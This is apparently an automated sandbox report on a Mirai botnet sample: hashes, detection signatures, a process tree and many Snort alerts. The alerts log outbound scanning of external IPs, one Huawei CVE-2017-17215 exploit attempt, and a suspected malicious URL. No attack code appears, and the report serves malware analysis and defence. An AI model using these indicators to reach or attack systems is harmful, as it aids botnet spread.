Edit tour

Linux Analysis Report
qFhgp7xLT7

Overview

General Information

Sample Name:	qFhgp7xLT7
Analysis ID:	635076
MD5:	60c16bbdea70d058618c85e3e7d5a7c5
SHA1:	333cc469a02c21fdde6206127bc0656919f7d05c
SHA256:	3d8b14056393a46c2f3b2c2db245f3d3bef205eae544ab7a01cb47d56cbb8e8c
Tags:	32elfintelmirai
Infos:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Yara detected Mirai

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Sample tries to kill multiple processes (SIGKILL)

Sample has stripped symbol table

HTTP GET or POST without a user agent

Enumerates processes within the "proc" file system

Detected TCP or UDP traffic on non-standard ports

Sample tries to kill a process (SIGKILL)

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	635076
Start date and time: 27/05/202212:30:06	2022-05-27 12:30:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	qFhgp7xLT7
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.spre.troj.lin@0/0@0/0

Warnings

Report size exceeded maximum capacity and may have missing network information.
TCP Packets have been reduced to 100
VT rate limit hit for: http://102.129.143.42:45766/

Runtime Messages

Command:	/tmp/qFhgp7xLT7
PID:	6237
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Infected By Cult
Standard Error:

Process Tree

system is lnxubuntu20

qFhgp7xLT7 (PID: 6237, Parent: 6125, MD5: 60c16bbdea70d058618c85e3e7d5a7c5) Arguments: /tmp/qFhgp7xLT7

qFhgp7xLT7 New Fork (PID: 6238, Parent: 6237)

qFhgp7xLT7 New Fork (PID: 6239, Parent: 6237)

qFhgp7xLT7 New Fork (PID: 6240, Parent: 6237)

qFhgp7xLT7 New Fork (PID: 6241, Parent: 6240)

qFhgp7xLT7 New Fork (PID: 6242, Parent: 6240)

qFhgp7xLT7 New Fork (PID: 6244, Parent: 6240)

qFhgp7xLT7 New Fork (PID: 6245, Parent: 6240)

qFhgp7xLT7 New Fork (PID: 6246, Parent: 6240)

qFhgp7xLT7 New Fork (PID: 6247, Parent: 6240)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Snort Signatures

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.72.202.70

Timestamp:	192.168.2.23112.72.202.7037234802839471 05/27/22-12:33:25.144916
SID:	2839471
Source Port:	37234
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.248.3.12

Timestamp:	192.168.2.2388.248.3.1233844802839471 05/27/22-12:32:09.515172
SID:	2839471
Source Port:	33844
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.67.128

Timestamp:	192.168.2.2388.221.67.12845550802839471 05/27/22-12:31:17.612604
SID:	2839471
Source Port:	45550
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.95.58

Timestamp:	192.168.2.2388.198.95.5834904802839471 05/27/22-12:33:19.894224
SID:	2839471
Source Port:	34904
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.157.135

Timestamp:	192.168.2.2395.216.157.13536388802839471 05/27/22-12:31:45.532082
SID:	2839471
Source Port:	36388
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.80.187.20

Timestamp:	192.168.2.2388.80.187.2054684802839471 05/27/22-12:31:48.571853
SID:	2839471
Source Port:	54684
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.186.20.38

Timestamp:	192.168.2.23112.186.20.3843052802839471 05/27/22-12:32:37.328412
SID:	2839471
Source Port:	43052
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.142.154.35

Timestamp:	192.168.2.2395.142.154.3538450802839471 05/27/22-12:33:45.996466
SID:	2839471
Source Port:	38450
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.119.176.78

Timestamp:	192.168.2.2388.119.176.7846082802839471 05/27/22-12:31:17.602521
SID:	2839471
Source Port:	46082
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.202.185.34

Timestamp:	192.168.2.2388.202.185.3443256802839471 05/27/22-12:31:48.544252
SID:	2839471
Source Port:	43256
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.213.144.234

Timestamp:	192.168.2.2395.213.144.23458586802839471 05/27/22-12:31:56.949860
SID:	2839471
Source Port:	58586
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.72.55.52

Timestamp:	192.168.2.23112.72.55.5240524802839471 05/27/22-12:33:51.607828
SID:	2839471
Source Port:	40524
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.182.104

Timestamp:	192.168.2.2388.221.182.10450788802839471 05/27/22-12:32:43.974254
SID:	2839471
Source Port:	50788
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.181.216.188

Timestamp:	192.168.2.2395.181.216.18845576802839471 05/27/22-12:31:45.532015
SID:	2839471
Source Port:	45576
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.46.56

Timestamp:	192.168.2.2395.216.46.5638706802839471 05/27/22-12:30:59.349797
SID:	2839471
Source Port:	38706
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.197.186.69

Timestamp:	192.168.2.23112.197.186.6934248802839471 05/27/22-12:34:15.486204
SID:	2839471
Source Port:	34248
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.85.49.125

Timestamp:	192.168.2.2395.85.49.12557494802839471 05/27/22-12:31:01.042653
SID:	2839471
Source Port:	57494
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.51.178

Timestamp:	192.168.2.2395.101.51.17833806802839471 05/27/22-12:34:11.712649
SID:	2839471
Source Port:	33806
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.248.97.42

Timestamp:	192.168.2.2388.248.97.4251404802839471 05/27/22-12:31:19.756383
SID:	2839471
Source Port:	51404
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.211.86.222

Timestamp:	192.168.2.23112.211.86.22251576802839471 05/27/22-12:31:28.539011
SID:	2839471
Source Port:	51576
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 197.234.59.49

Timestamp:	192.168.2.23197.234.59.4957624372152835222 05/27/22-12:33:52.815817
SID:	2835222
Source Port:	57624
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.223.88

Timestamp:	192.168.2.2395.217.223.8845340802839471 05/27/22-12:31:01.059678
SID:	2839471
Source Port:	45340
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.80.109.205

Timestamp:	192.168.2.2395.80.109.20545624802839471 05/27/22-12:33:44.241244
SID:	2839471
Source Port:	45624
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.183.11.60

Timestamp:	192.168.2.2395.183.11.6060636802839471 05/27/22-12:31:33.291681
SID:	2839471
Source Port:	60636
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.153.193.105

Timestamp:	192.168.2.2388.153.193.10557226802839471 05/27/22-12:33:32.506696
SID:	2839471
Source Port:	57226
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.186.70.80

Timestamp:	192.168.2.23112.186.70.8049836802839471 05/27/22-12:31:46.023807
SID:	2839471
Source Port:	49836
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.110.179.229

Timestamp:	192.168.2.2395.110.179.22947442802839471 05/27/22-12:32:12.681029
SID:	2839471
Source Port:	47442
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.166.221.94

Timestamp:	192.168.2.23112.166.221.9432838802839471 05/27/22-12:32:39.180234
SID:	2839471
Source Port:	32838
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.212.1.166

Timestamp:	192.168.2.2388.212.1.16633040802839471 05/27/22-12:32:16.185110
SID:	2839471
Source Port:	33040
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.14.86.198

Timestamp:	192.168.2.2395.14.86.19846290802839471 05/27/22-12:31:33.281866
SID:	2839471
Source Port:	46290
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.167.174.105

Timestamp:	192.168.2.23112.167.174.10546562802839471 05/27/22-12:31:50.944811
SID:	2839471
Source Port:	46562
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.186.20.38

Timestamp:	192.168.2.23112.186.20.3843220802839471 05/27/22-12:32:47.374861
SID:	2839471
Source Port:	43220
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.119.146.26

Timestamp:	192.168.2.2388.119.146.2644976802839471 05/27/22-12:33:27.528059
SID:	2839471
Source Port:	44976
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.225.227.244

Timestamp:	192.168.2.2388.225.227.24433820802839471 05/27/22-12:31:06.463207
SID:	2839471
Source Port:	33820
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.81.130.67

Timestamp:	192.168.2.23112.81.130.6753396802839471 05/27/22-12:31:51.424495
SID:	2839471
Source Port:	53396
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.56.61.3

Timestamp:	192.168.2.2395.56.61.339992802839471 05/27/22-12:31:33.483422
SID:	2839471
Source Port:	39992
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.175.41.180

Timestamp:	192.168.2.23112.175.41.18034328802839471 05/27/22-12:32:13.340256
SID:	2839471
Source Port:	34328
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.93.134

Timestamp:	192.168.2.23112.74.93.13439556802839471 05/27/22-12:32:02.442088
SID:	2839471
Source Port:	39556
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.40.188

Timestamp:	192.168.2.2388.221.40.18858726802839471 05/27/22-12:31:54.763991
SID:	2839471
Source Port:	58726
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.56.210.231

Timestamp:	192.168.2.2395.56.210.23144612802839471 05/27/22-12:31:00.444715
SID:	2839471
Source Port:	44612
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.211.24.216

Timestamp:	192.168.2.2395.211.24.21636048802839471 05/27/22-12:34:29.393344
SID:	2839471
Source Port:	36048
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.163.202.34

Timestamp:	192.168.2.2395.163.202.3455820802839471 05/27/22-12:31:35.237352
SID:	2839471
Source Port:	55820
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.218.28.73

Timestamp:	192.168.2.2388.218.28.7358892802839471 05/27/22-12:32:18.783163
SID:	2839471
Source Port:	58892
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.7.134

Timestamp:	192.168.2.2395.100.7.13456148802839471 05/27/22-12:33:06.960464
SID:	2839471
Source Port:	56148
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.174.197.184

Timestamp:	192.168.2.2395.174.197.18435646802839471 05/27/22-12:31:11.849947
SID:	2839471
Source Port:	35646
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.79.44

Timestamp:	192.168.2.23112.74.79.4439520802839471 05/27/22-12:31:50.936841
SID:	2839471
Source Port:	39520
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.149.226.201

Timestamp:	192.168.2.23112.149.226.20155834802839471 05/27/22-12:32:37.572523
SID:	2839471
Source Port:	55834
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.186.20.38

Timestamp:	192.168.2.23112.186.20.3843104802839471 05/27/22-12:32:41.687023
SID:	2839471
Source Port:	43104
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.168.210.33

Timestamp:	192.168.2.2395.168.210.3346156802839471 05/27/22-12:32:06.984091
SID:	2839471
Source Port:	46156
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.211.152.137

Timestamp:	192.168.2.2395.211.152.13753944802839471 05/27/22-12:32:18.728402
SID:	2839471
Source Port:	53944
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.142.205.212

Timestamp:	192.168.2.2395.142.205.21235762802839471 05/27/22-12:31:34.926249
SID:	2839471
Source Port:	35762
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.238.152.223

Timestamp:	192.168.2.2395.238.152.22358532802839471 05/27/22-12:32:22.621176
SID:	2839471
Source Port:	58532
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.70.247

Timestamp:	192.168.2.2395.100.70.24736802802839471 05/27/22-12:32:30.210014
SID:	2839471
Source Port:	36802
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.58.244.64

Timestamp:	192.168.2.2395.58.244.6440006802839471 05/27/22-12:32:30.316788
SID:	2839471
Source Port:	40006
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.151.105

Timestamp:	192.168.2.2388.198.151.10550458802839471 05/27/22-12:31:23.849032
SID:	2839471
Source Port:	50458
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.65.82.201

Timestamp:	192.168.2.2395.65.82.20149266802839471 05/27/22-12:34:15.312931
SID:	2839471
Source Port:	49266
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.87.122.44

Timestamp:	192.168.2.2388.87.122.4440572802839471 05/27/22-12:31:54.832677
SID:	2839471
Source Port:	40572
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.20.119.93

Timestamp:	192.168.2.2395.20.119.9339774802839471 05/27/22-12:33:53.002379
SID:	2839471
Source Port:	39774
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.214.91.9

Timestamp:	192.168.2.23112.214.91.943860802839471 05/27/22-12:34:06.593929
SID:	2839471
Source Port:	43860
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.124.202.59

Timestamp:	192.168.2.23112.124.202.5949088802839471 05/27/22-12:32:30.928386
SID:	2839471
Source Port:	49088
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.154.219.67

Timestamp:	192.168.2.2395.154.219.6738350802839471 05/27/22-12:32:36.726942
SID:	2839471
Source Port:	38350
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.84.182

Timestamp:	192.168.2.2395.100.84.18252118802839471 05/27/22-12:31:38.667115
SID:	2839471
Source Port:	52118
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.235.105.204

Timestamp:	192.168.2.2395.235.105.20446940802839471 05/27/22-12:33:12.901640
SID:	2839471
Source Port:	46940
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.178.147.97

Timestamp:	192.168.2.23112.178.147.9751130802839471 05/27/22-12:31:28.520517
SID:	2839471
Source Port:	51130
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.204.110

Timestamp:	192.168.2.2395.100.204.11037574802839471 05/27/22-12:31:00.396025
SID:	2839471
Source Port:	37574
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.137.152

Timestamp:	192.168.2.2388.198.137.15253476802839471 05/27/22-12:31:42.335689
SID:	2839471
Source Port:	53476
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.154.221.177

Timestamp:	192.168.2.2395.154.221.17751686802839471 05/27/22-12:32:22.567031
SID:	2839471
Source Port:	51686
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.84.42

Timestamp:	192.168.2.2388.99.84.4244326802839471 05/27/22-12:31:54.754494
SID:	2839471
Source Port:	44326
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.82.7

Timestamp:	192.168.2.2395.217.82.746910802839471 05/27/22-12:31:19.799558
SID:	2839471
Source Port:	46910
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.164.173.23

Timestamp:	192.168.2.23112.164.173.2357754802839471 05/27/22-12:32:02.457344
SID:	2839471
Source Port:	57754
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.169.182.145

Timestamp:	192.168.2.23112.169.182.14540522802839471 05/27/22-12:31:28.532451
SID:	2839471
Source Port:	40522
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.211.189.204

Timestamp:	192.168.2.2395.211.189.20459478802839471 05/27/22-12:33:00.977962
SID:	2839471
Source Port:	59478
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.171.40.223

Timestamp:	192.168.2.23112.171.40.22351266802839471 05/27/22-12:34:26.065722
SID:	2839471
Source Port:	51266
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.98.181.157

Timestamp:	192.168.2.2388.98.181.15749770802839471 05/27/22-12:33:01.043025
SID:	2839471
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.161.28

Timestamp:	192.168.2.2395.101.161.2857428802839471 05/27/22-12:31:33.308821
SID:	2839471
Source Port:	57428
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.58.113.5

Timestamp:	192.168.2.2395.58.113.559516802839471 05/27/22-12:32:19.026650
SID:	2839471
Source Port:	59516
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.208.214.83

Timestamp:	192.168.2.2388.208.214.8354508802839471 05/27/22-12:33:14.819620
SID:	2839471
Source Port:	54508
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.59.245.20

Timestamp:	192.168.2.2395.59.245.2043218802839471 05/27/22-12:32:30.308154
SID:	2839471
Source Port:	43218
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.208.220.5

Timestamp:	192.168.2.2388.208.220.547198802839471 05/27/22-12:31:23.868712
SID:	2839471
Source Port:	47198
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.39.140.15

Timestamp:	192.168.2.2395.39.140.1534816802839471 05/27/22-12:31:38.557073
SID:	2839471
Source Port:	34816
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.22.247.175

Timestamp:	192.168.2.2388.22.247.17554798802839471 05/27/22-12:32:16.218137
SID:	2839471
Source Port:	54798
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.80.166

Timestamp:	192.168.2.2395.101.80.16635368802839471 05/27/22-12:31:19.815486
SID:	2839471
Source Port:	35368
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.165.255.5

Timestamp:	192.168.2.2395.165.255.538992802839471 05/27/22-12:34:00.476246
SID:	2839471
Source Port:	38992
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.179.72

Timestamp:	192.168.2.2395.101.179.7247718802839471 05/27/22-12:33:45.559487
SID:	2839471
Source Port:	47718
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.31.233.3

Timestamp:	192.168.2.2388.31.233.346718802839471 05/27/22-12:31:20.193652
SID:	2839471
Source Port:	46718
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.138.128.78

Timestamp:	192.168.2.2395.138.128.7836584802839471 05/27/22-12:31:54.758519
SID:	2839471
Source Port:	36584
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.59.33.161

Timestamp:	192.168.2.2395.59.33.16151250802839471 05/27/22-12:32:24.240623
SID:	2839471
Source Port:	51250
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.163.26.192

Timestamp:	192.168.2.2388.163.26.19238608802839471 05/27/22-12:32:18.792798
SID:	2839471
Source Port:	38608
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.46.138

Timestamp:	192.168.2.2388.221.46.13850426802839471 05/27/22-12:31:51.214773
SID:	2839471
Source Port:	50426
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.26.93

Timestamp:	192.168.2.2395.217.26.9340238802839471 05/27/22-12:32:22.579519
SID:	2839471
Source Port:	40238
